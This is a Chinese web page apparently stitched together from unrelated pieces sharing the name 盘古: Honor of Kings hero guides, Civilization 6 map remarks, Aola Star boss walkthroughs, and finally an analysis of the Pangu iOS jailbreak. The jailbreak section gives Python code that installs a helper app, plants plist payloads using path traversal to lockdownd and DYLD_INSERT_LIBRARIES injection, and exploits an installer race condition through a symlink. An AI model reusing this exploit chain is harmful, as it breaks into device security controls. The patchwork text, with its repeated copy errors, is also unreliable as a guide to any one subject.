盘古怎么玩
技能描述
被动技能:盘古斧
解析:盘古的被动技能,可以让这个英雄拥有两种攻击形态,初始是斧形态,有着很高的攻击伤害,也是盘古的主要攻击手段,攻击10次后变成能量臂,能量臂在攻击对手时,可以对敌人进行标记,标记达到5层触发额外的伤害,并造成晕眩效果,进一步提升了盘古的普攻输出,又增加了控制能力。
技能一:狂怒突袭
解析:盘古跳起对目标区域造成伤害,和程咬金的一技能差不多,不同的是盘古起跳后,目标区域外有敌人的话,也会冲向敌人造成击退和伤害,这就增加了技能一的容错率,即使没有技能没有命中敌人,只要靠的近,还是会触发伤害效果的,十分的好用。
技能二:缴械之握
解析:二技能是盘古最常使用的一个技能,可以在目标身旁召唤正义之手进攻,如果攻击命中敌人,就能对敌人减速造成伤害,还有减少缴械技能冷却的效果,所以只要技能可以命中,再加上本身不多的技能CD,就可以一直释放缴械。缴械在对同目标释放两次后,会让对手失去普攻能力3秒,这大大增强看盘古的对线能力,可以有效的抑制对手的普攻输出,是一个很强力的技能。
技能三:开天辟地
解析:盘古跳起,破坏前方地形,对一条线上的敌人造成伤害,和牛魔的技能差不多。盘古的大招在团战中可以发挥强大的作用,可以有效的分割战场,搅乱敌人的阵型,而且大招释放后,可以对周围段距离内的敌人造成拉扯,有着不错的控制能力,只要盘古大招放的好坏,基本上就能决定一场团战的输赢,所以一定要时刻把控好大招的释放时机。
技能加点及连招教学
技能加点:1级学技能一,之后主二副一,有大点大。
连招技巧:基础连招为一技能+二技能+二技能+大招。盘古可以用一技能进行起手,快速的接近目标,对敌人造成伤害,如果对手反击,就要尽早用掉缴械,加快缴械的冷却时间,中间穿插普通攻击,等到缴械好了再次释放,就能对敌人进行控制,使对手无法使用普攻,追上去继续打输出,一技能可以继续用,但大招一定要留着,对手使用位移技能逃跑的时候,可以用大招留人,就能配合队友完成击杀。
盘古的主要输出技能是二技能,在线上就要多用缴械对敌人进行攻击,利用缴械的技能效果不断消耗对手,在团战的时候也能用一技能起跳,然后针对地方的射手使用缴械,这样就能大大的减少敌方的输出,但想要使用这个打法,一定要和队友配合好,不然单枪匹马进入人堆后可就难出来了。
盘古的技能还是很好操控的,即使玩家在线上打不出优势,盘古在团战中放好大招也能轻松取得胜利。
王者荣耀盘古怎么玩?
当你使用该英雄时:盘古的1技能具有较强的操作空间,合理判断敌我的位置关系,可将敌人击退到一个对自己最有利的位置去-盘古的大招在队友的支持下会十分强大,让队友一起抱团作战,更利于盘古发挥对手使用该英雄时:-盘古切换武器时,会处于无敌状态-注意关注盘古斧头耐久度的情况,盘古通常会在斧头濒临破碎时开团
王者荣耀盘古的被动怎么用?
被动:10点耐久度,每次普攻命中敌人会消耗1点耐久度;每次普攻命中会在敌人升上叠加一层眩晕标记,满5层会使敌人眩晕0.5秒并触发额外伤害,此效果对同一目标有3秒的冷却时间。
所以在使用被动的时候,我们可以在已经叠加4层标记的时候,我们可以用1技能上去,落地眩晕,打一套消耗就走。盘古怎么玩
出装思路:前期先出抵抗之靴减少被控时间,增加普攻速度打出被动,如果上路对线首先可以出红莲斗篷增加坦度,提高对线能力。
中期可以出暗影战斧和法术防御,如果对方法师伤害低,可以等后期再出,根据阵容有限出减速装,冰痕之握或者极寒风暴,不过建议出冰痕之握,强化普攻伤害。
后期可出复活甲,提高保命能力,也可根据情况调整出装思路,伤害不够叠加伤害,输出不够叠加伤害。
王者荣耀 盘古怎么玩? 斧头怎么断的?
王者荣耀盘古斧头耐久度有多少?王者荣耀盘古出装 盘古初始用的是斧头,斧头一共有10点耐久度,当耐久度为0时会破碎变成两只能量臂出现在盘古的身体两侧,每次攻击敌方英雄会消耗一点耐久度.斧→臂或者臂→斧转换期间是无敌状态,不能被攻击或者控制,但自身也不能攻击,时间很短所以可以利用这个挡控制或致命伤害. 盘古斧头耐久度怎么恢复? 随着时间自动恢复:每6秒恢复一点耐久度. 虽然斧头耐久最高10点,但能量臂转斧头只要求5点耐久度,也就是能量臂形态下最快30秒能转换斧头.之前斧头打小兵野怪也会消耗耐久,但最新版本已调整.
文明6盘古大陆怎么玩 经典地图玩法介绍
盘古大陆的难度明显高于其它地图,关键还是移动力,盘古大陆的地形相比其它地图,实在比较复杂,玩分大陆跟玩盘古完全两回事.各种因为移动力问题卵疼..是啊,也因为AI的各种问题,天神真心容易,特别是征服,AI的兵不会升级.只有后面锤的兵高级,早期的棒子,叉子会一直保留到现代
王者荣耀英雄盘古变身怎么用?
盘古斧形态用不了,只有能量臂形态能用,每次普攻会消耗斧头耐久度,消耗完就变成能量臂形态,然后才能选择变回斧头形态
奥拉星盘古完全体怎么打 盘古完全体平民打法
第一关,战胜神农完全体
过关要求:抽到神农完全体并战胜它即可过关(抽到其他效果看RP)
(PS:点了开始挑战不能治疗亚比和调整亚比,所以在开始前调整好亚比顺序,星币 治疗亚比一次5星币,增加转轮次数1次4星币)
亚比配置:双冰雪女皇,一只冰雪大帝和神迹凌风(特性隨便)
打法过程:寒冰一族自爆不解释(注意:冰雪大帝霜冻佑护护属),然后凌风大招轰 基本一次轰掉。
第二关,战胜女蜗完全体
过关要求:抽到女娲完全体并战胜它即可过关(抽到其他效果看RP)
(PS:点了开始挑战不能治疗亚比和调整亚比,所以在开始前调整好亚比顺序,星币治疗亚比一次5星币,增加转轮次数1次4星币)
亚比配置:双冰雪女皇,一只冰雪大帝和神迹凌风(特性随便)
打法过程:寒冰一族自爆不解释(注意:冰雪大帝霜冻佑护护属),然后凌风大招轰 基本一次轰掉。
第三关,战胜轩辕完全体
过关要求:抽到女娲完全体并战胜它即可过关(抽到其他效果看RP)
(PS:点了开始挑战不能治疗亚比和调整亚比,所以在开始前调整好亚比顺序,星币治疗亚比一次5星币,增加转轮次数1次4星币)
亚比配置:双冰雪女皇,一只冰雪大帝和神迹凌风(特性随便)
打法过程:寒冰一族自爆不解释(注意:冰雪大帝霜冻佑护护属),然后凌风大招轰 基本一次轰掉。
第四关,战胜最终BOSS-盘古完全体
对于乾坤修罗神完全体,轩辕奇灵完全体,天使王完全体和东皇太一完全体,
亚比需求:双女皇大帝+1明王=乾坤修罗神完全体,轩辕奇灵完全体,天使王完全体和东皇太一完全体
打法过程:冰雪一族自爆(大帝护属),然后明王大招输出即可(BOSS不会用奥义) (这一关所有效果楼主都抽到,楼主人品好就过了)
盘古完全体打法
过关要求:抽到盘古完全体并战胜它即可过关(抽到其他效果看RP)
(PS:点了开始挑战不能治疗亚比和调整亚比,所以在开始前调整好亚比顺序,星币 治疗亚比一次5星币,增加转松次数1次4星币)
亚比配置:双冰雪女皇,一直冰雪大帝和神迹凌风(特性随便)
打法垃程:寒冰一族自爆不解释(注意:冰雪大帝霜冻佑护护属),然后凌风大招轰 暴击基本一次轰掉。(盘古全属性为-6时古王战歌基本打不中)还有打一次锁一次属, 这里运气不好就被他恢复了特防,所以才一万多,打了两次把他打死。
无忧舛奇 力求原汁原味无忧舛奇再现经典,甚至原版复刻了经典的玩法,为的是让热血玩家们能够重温昔日的光辉岁月。
掠夺者盘古装备攻略 盘古应该穿什么装备
从上文为大家带来的属性介绍中可以看到,屠杀者套装可以为我们带来不错的无视防御攻击力加成,让盘古在与高防御敌人进行战斗的时候,可以造成有效的伤害输出.什么是无视防御攻击力呢?在游戏中,每一个怪物、玩家都是有着一定的防御力的,防御力与属性可以降低我们被攻击的时候所受到的伤害,防御力越高受到的伤害就越低.
盘古大招怎么劈成三条
队友越多数量越多. 王者荣耀盘古出装 盘古向上跃起,将力量汇聚到灵能之斧上.力量汇聚完毕后盘古会将斧头朝前劈下,地面会朝前逐渐裂开,被地面的裂纹触碰的敌人会受到伤害并减速.蓄力期间盘古可以吸收附近友方英雄的力量,每吸收1个就能多劈出一道裂缝,最多劈出5道.
盘古怎么越狱?
主要的组件、盘古主要由四部分组成:
1、桌面程序:提供资源,控制越狱流程。
2、com.pangu.ipa1.ipa:Socket Server,与桌面程序配合制造竞态条件。
3、pangu.dylib,Socket Server,利用内核漏洞安装Untecher,Cydia等。
4、pangu.tar,Untecher
这里主要涉及的是前两个组件,及第三个组件中用户空间相关的部分。
工作流程
说明:为了验证自己的分析是正确的,用Python重新实现了盘古桌面程序的功能,利用盘古的Payload可以实现越狱,下面会在主要阶段给出相应示例代码。
阶段一:安装辅助程序,获取相关资源
1、安装com.pangu.ipa1.ipa
複製代碼
def install_pangu():
lockdown = LockdownClient()
afc = AFCClient(lockdown)
mci = lockdown.startService(\\”com.apple.mobile.installation_proxy\\”)
file_name = \\”com.pangu.ipa1.ipa\\”
afc.set_file_contents(\\”/PublicStaging/\\” + file_name, open(\\”payload/\\” + file_name,\\”rb\\”).read())
mci.sendPlist({\\”Command\\”:\\”Install\\”, \\”PackagePath\\”: \\”/PublicStaging/\\” + file_name})
while True:
status = mci.recvPlist()
if not status:
break
completion = status.get(\\”PercentComplete\\”)
if completion:
print \\”Installing, %s: %s %% Complete\\” % (\\”com.pangu.ipa1.ipa\\”, status[\\”PercentComplete\\”])
if status.get(\\”Status\\”) == \\”Complete\\”:
print \\”Installation %s\n\\” % status[\\”Status\\”]
break
mci.close()
afc.stop_session()
lockdown.stop_session()
首先利用AFC服务将IPA传到设备上,然后利用 Installation Proxy 安装应用。
2、获取Cache
複製代碼
def download_caches():
fc = FileRelayClient()
data = fc.request_sources([\\”Caches\\”])
fc.stop_session()
if data:
file_path = \\”./payload/caches.gz\\”
output_path = \\”./payload/caches\\”
open(file_path,\\”wb\\”).write(data)
print \\”Data saved to: %s \\” % file_path
with open(file_path, \\”r\\”) as f:
gz = gzip.GzipFile(mode=\\”rb\\”, fileobj=f)
cpio = CpioArchive(fileobj=BytesIO(gz.read()))
cpio.extract_files(files=None,outpath=output_path)
else:
print \\”Fail to get caches\\”
raise Exception(\\”Fail to get caches\\”)
调用 FileRelay 服务,获取Cache,主要是从中拿到com.apple.mobile.installation.plist
3、修改 com.apple.mobile.installation.plist修改是针对盘古程序的,具体修改如下:
複製代碼
CFBundleExecutable = \\”../../../../../../usr/libexec/lockdownd\\”;
EnvironmentVariables = { DYLD_INSERT_LIBRARIES = \\”/private/var/mobile/Media/Pangu-Install/pangu.dylib\\”; };
4、修改盘古程序的Info.plist
複製代碼
CFBundleExecutable = \\”../../../../../../usr/libexec/lockdownd\\”;
5、构造applicationState.plist
複製代碼
{ \\”com.pangu.ipa1\\” = { SBApplicationAutoLaunchForVoIP = :true; }; }
这个会造成盘古程序在设备重启后自动运行。
6、com.apple.LaunchServices-056.csstore 主要是为了更新程序列表
7、com.apple.backboardd.plist 禁用“看门狗”
基于上述文件盘古会构造三个Payload。
複製代碼
def generate_upgrade_bundle1():
guid_str = get_guid()
with ZipFile(\\”./payload/upgrade1.zip\\”, \\”w\\”) as payload:
payload.write(\\”./payload/upgrade_bundle/bigfile\\”, \\”/tmp/bigfile\\”)
payload.write(\\”./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore\\”, \\”/mobile/Library/Caches/com.apple.LaunchServices-056.csstore\\”)
payload.write(\\”./payload/upgrade_bundle/com.apple.mobile.installation.plist\\”, \\”/mobile/Library/Caches/com.apple.mobile.installation.plist\\”)
payload.write(\\”./payload/upgrade_bundle/applicationState.plist\\”, \\”/mobile/Library/BackBoard/applicationState.plist\\”)
payload.write(\\”./payload/upgrade_bundle/com.apple.backboardd.plist\\”, \\”/mobile/Library/Preferences/com.apple.backboardd.plist\\”)
payload.write(\\”./payload/upgrade_bundle/Info.plist\\”, \\”/mobile/Applications/\\” + guid_str + \\”/ipa1.app/Info.plist\\”)
def generate_upgrade_bundle2():
# os.remove(\\”./payload/upgrade2.zip\\”)
guid_str = get_guid()
with ZipFile(\\”./payload/upgrade2.zip\\”, \\”w\\”) as payload:
payload.write(\\”./payload/upgrade_bundle/bigfile\\”, \\”/tmp/bigfile\\”)
payload.write(\\”./payload/upgrade_bundle/com.apple.mobile.installation.plist\\”, \\”/mobile/Library/Caches/com.apple.mobile.installation.plist\\”)
def generate_upgrade_bundle3():
# os.remove(\\”./payload/upgrade3.zip\\”)
guid_str = get_guid()
with ZipFile(\\”./payload/upgrade3.zip\\”, \\”w\\”) as payload:
payload.write(\\”./payload/upgrade_bundle/bigfile\\”, \\”/tmp/bigfile\\”)
payload.write(\\”./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore\\”, \\”/mobile/Library/Caches/com.apple.LaunchServices-056.csstore\\”)
这个阶段会知道三个程序升级包,供下一阶段使用。
另外,可以简单的理解为:执行完这个阶段就对应着盘古提示用户在手机上启动程序。
阶段二:利用竞态条件安装文件,构造环境执行pangu.dylib
当用户在手机上启动程序后,手机上的App会启动一个Socket Server,等待桌面程序的握手,这个握手的暗语挺有意思。桌面向App发送:PING,App收到后回应桌面:PONG。在握手完成后,盘古开始利用静态条件将如上构造的三个Payload安装到手机上。
具体过程为首先利用安装服务安装升级包,在安装的过程中桌面向App发送starthook,具体hook的内容可以通过调试App确定是创建一个符号链接:
複製代碼
\\”/private/var/tmp/install_staging.eP7ZzJ/foo_extracted\\” —> \\”/var/\\”
其中后缀部分会因为每次安装而不同。
示例代码:
複製代碼
def fire_race_condition(lockdown, file_name):
mci = lockdown.startService(\\”com.apple.mobile.installation_proxy\\”)
sock = get_sock()
print \\”—–>PING\\”
sock.send(\\”PING\\”)
msg = sock.recv(4)
if msg == \\”PONG\\”:
print \\”<-----PONG\n\\"
upgrade_pangu(mci, file_name)
print \\”—–>starthook\\”
sock.send(\\”starthook\\”)
msg = sock.recv(4)
if msg == \\”succ\\”:
print \\”<-----success\n\\"
else:
print \\”<-----fail\n\\"
在完成安装三个Payload之后,盘古会上传文件到Media中的 Pangu-Install目录:
Cydia.tar
packagelist.tar
pangu.dylib
pangu.tar
pangu_ex.tar
至此,盘古基本完成了用户空间的行为,在界面上的反应为:盘古会第一次重启设备。
阶段三:利用漏洞安装Untecher,Cydia
设备重启完成后,pangu.dylib会被加载,并启动一个 Socket Server。桌面程序在检测到设备加载后会向 pangu.dylib 发送:55AA,pangu.dylib 接到 55AA后开始安装Untecher、Cydia。
阶段四:清理
在pangu.dylib完成工作后,向桌面程序发送:AA55,桌面程序开始清理临时文件,删除Provisional文件,恢复设备时间等操作。在完成清理操作后,桌面程序会第二次重启设备,至此越狱完成。
